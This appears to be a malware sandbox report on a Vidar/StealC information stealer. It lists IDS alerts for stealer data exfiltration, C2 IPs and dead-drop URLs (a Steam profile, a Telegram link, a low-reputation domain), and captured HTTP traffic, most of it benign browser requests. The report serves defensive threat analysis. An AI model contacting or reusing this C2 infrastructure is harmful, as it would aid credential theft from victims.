Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50088 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50057 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50117 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50117 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50121 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50121 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50124 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50124 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50126 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50126 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50135 -> 116.202.2.159:443
Source: Network traffic	Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50137 -> 116.202.2.159:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199825403037

Performs DNS queries to domains with low reputation

Source:

DNS query: xu1.dijiafuzhu.xyz

Source: global traffic

HTTP traffic detected: GET /b4cha00 HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 23.219.82.75 23.219.82.75
Source: Joe Sandbox View	IP Address: 52.182.141.63 52.182.141.63
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.70.121.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 108.139.47.33
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63

Source: global traffic	HTTP traffic detected: GET /b4cha00 HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:137.0) Gecko/20100101 Firefox/137.0Host: xu1.dijiafuzhu.xyzConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.33af08fdb9e988f1db9e.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.55sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: /sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=7F165C55FFFE4D7FACA988D1B9761219.RefC=2025-02-17T12:03:22Z; USRLOC=; MUID=247581D5D86769782C0D9443D9ED68BE; MUIDB=247581D5D86769782C0D9443D9ED68BE; _EDGE_S=F=1&SID=32366AC5492F65B21A5F7F5348E86499; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.96ac23719317b1928681.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.55sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: /sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=7F165C55FFFE4D7FACA988D1B9761219.RefC=2025-02-17T12:03:22Z; USRLOC=; MUID=247581D5D86769782C0D9443D9ED68BE; MUIDB=247581D5D86769782C0D9443D9ED68BE; _EDGE_S=F=1&SID=32366AC5492F65B21A5F7F5348E86499; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.f30eb488fb3069c7561f.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.5da1d823f3d7131a6bff.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.a4f044fd68445545fb52.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.a72730bb2b7a5325927d.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /crx/blobs/ASuc5ohfQPNzGo5SSihcSk6msC8CUKw5id-p0KCEkBKwK2LS4AjdrDP0wa1qjzCTaTWEfyM52ADmUAdPETYA5vgD87UPEj6gyG11hjsvMLHGmzQgJ9F5D8s8Lo0Lbai5BQYAxlKa5esPJXukyaicyq83JwZ0HIWqzrjN/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_86_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1739793807751&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=7f165c55fffe4d7faca988d1b9761219&activityId=7f165c55fffe4d7faca988d1b9761219&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=247581D5D86769782C0D9443D9ED68BE; _EDGE_S=F=1&SID=32366AC5492F65B21A5F7F5348E86499; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /b?rn=1739793807752&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=247581D5D86769782C0D9443D9ED68BE&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b2?rn=1739793807752&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=247581D5D86769782C0D9443D9ED68BE&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=149c6b0ef4a11fedd79e4261739793809; XID=149c6b0ef4a11fedd79e4261739793809
Source: global traffic	HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 6.5sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 200sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: /sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=7F165C55FFFE4D7FACA988D1B9761219.RefC=2025-02-17T12:03:22Z; USRLOC=; MUID=247581D5D86769782C0D9443D9ED68BE; MUIDB=247581D5D86769782C0D9443D9ED68BE; _EDGE_S=F=1&SID=32366AC5492F65B21A5F7F5348E86499; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=8fcf6638-0ee7-4398-a7c7-cf2f20078797; ai_session=5DhYFheQLuPvu1AnO83W8w\|1739793807746\|1739793807746; sptmarket_restored=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=7F165C55FFFE4D7FACA988D1B9761219.RefC=2025-02-17T12:03:22Z
Source: global traffic	HTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: /Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":29,"imageId":"BB1msOZa","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=7F165C55FFFE4D7FACA988D1B9761219.RefC=2025-02-17T12:03:22Z; USRLOC=; MUID=247581D5D86769782C0D9443D9ED68BE; MUIDB=247581D5D86769782C0D9443D9ED68BE; _EDGE_S=F=1&SID=32366AC5492F65B21A5F7F5348E86499; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=8fcf6638-0ee7-4398-a7c7-cf2f20078797; ai_session=5DhYFheQLuPvu1AnO83W8w\|1739793807746\|1739793807746; sptmarket_restored=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=7F165C55FFFE4D7FACA988D1B9761219.RefC=2025-02-17T12:03:22Z
